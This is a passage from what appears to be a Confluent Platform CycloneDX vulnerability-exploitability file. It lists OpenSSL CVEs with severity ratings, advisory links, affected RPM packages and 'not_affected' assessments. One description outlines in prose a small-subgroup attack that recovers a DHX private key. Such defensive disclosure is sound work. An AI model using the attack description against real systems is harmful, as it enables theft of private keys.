          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42770",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        325
      ],
      "description": "Issue summary: When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42)\npeer key, the peer key is not properly checked for the subgroup membership.\n\nImpact summary: A malicious peer which presents an X9.42 key carrying the\nvictim's p and g parameters, a forged q = r (a small prime factor of the\ncofactor (p\u22121)/q_local), and a public value Y of order r can recover the\nvictim's private key after a small number of key exchange attempts.\n\nWhen EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the\nsubgroup membership check Y^q \u2261 1 (mod p) is performed using the peer's\nown q parameter, not the local key's q. The peer's domain parameters are\nthen matched against the domain parameters of the private key, but the value\nof q is not compared.\n\nA malicious peer who presents an X9.42 key carrying the victim's p, g,\na forged q = r (a small prime factor of the cofactor), and a public\nvalue Y of order r passes all checks. The shared secret then takes only\nr distinct values, leaking priv mod r. Repeating for each small-prime\nfactor of the cofactor and combining via CRT recovers the full private\nkey (Lim\u2013Lee / small-subgroup-confinement attack).\n\nThe realistic attack surface is narrow: principally CMP deployments with\nlong-lived RA/CA DHX keys and bespoke enterprise or government applications\nusing X9.42 DHX static keys with interactive protocols and therefore this\nissue was assigned Low severity.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, 3.1.2 and 3.0 are affected by this\nissue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42770"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25237"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25239"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42770"
        },
        {
          "url": "https://bugzilla.redhat.com/2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/2481898"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481898"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-25237.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:25239"
        },
        {
          "url": "https://github.com/advisories/GHSA-3cxm-476w-ghm2"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/3da5a516cd2635a320ff748503db2cef7c4b0f02"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/3ddbb7ab50bd93dfc59cbe08e269a67605aeebdb"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/5f452bba2c681423d8fcffd120a19b757ee42e3c"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7fbfde7677ed8808828bf00ff01c937ca04bdda2"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ca2237ab5615641b662183b077f62c08d75e8070"
        },
        {
          "url": "https://github.com/openssl/security/commit/3da5a516cd2635a320ff748503db2cef7c4b0f02"
        },
        {
          "url": "https://github.com/openssl/security/commit/3ddbb7ab50bd93dfc59cbe08e269a67605aeebdb"
        },
        {
          "url": "https://github.com/openssl/security/commit/5f452bba2c681423d8fcffd120a19b757ee42e3c"
        },
        {
          "url": "https://github.com/openssl/security/commit/7fbfde7677ed8808828bf00ff01c937ca04bdda2"
        },
        {
          "url": "https://github.com/openssl/security/commit/ca2237ab5615641b662183b077f62c08d75e8070"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-42770.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50379.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42770"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42770"
        }
      ],
      "published": "2026-06-09T17:17:08+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42771",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Issue summary: When the X509_VERIFY_PARAM_set1_email is called by an\napplication to validate a crafted e-mail address, such as during S/MIME\nmessage validation, an out of bounds read can happen.\n\nImpact summary: This out of bounds read will not directly exfiltrate\nthe data read to the attacker so the most likely result is a crash and\na Denial of Service.\n\nAn internal helper function called from X509_VERIFY_PARAM_[set|add]_email()\nused a wrong length when validating the local part of an email address.\nThis could cause the 64 octet limit on the local part of an email address\nto be not enforced, or cause an out of bound read and potentially a crash.\n\nThe bug is reachable via S-MIME validation with a crafted From: address\nsupplied in an email message that can potentially cause a crash.\n\nNo FIPS modules are affected by this issue as the affected code is outside\nthe OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42771"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42771"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/6cd187689f8180c1f8a3acde21f88190c4a20de7"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42771"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42771"
        }
      ],
      "published": "2026-06-09T17:17:08+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
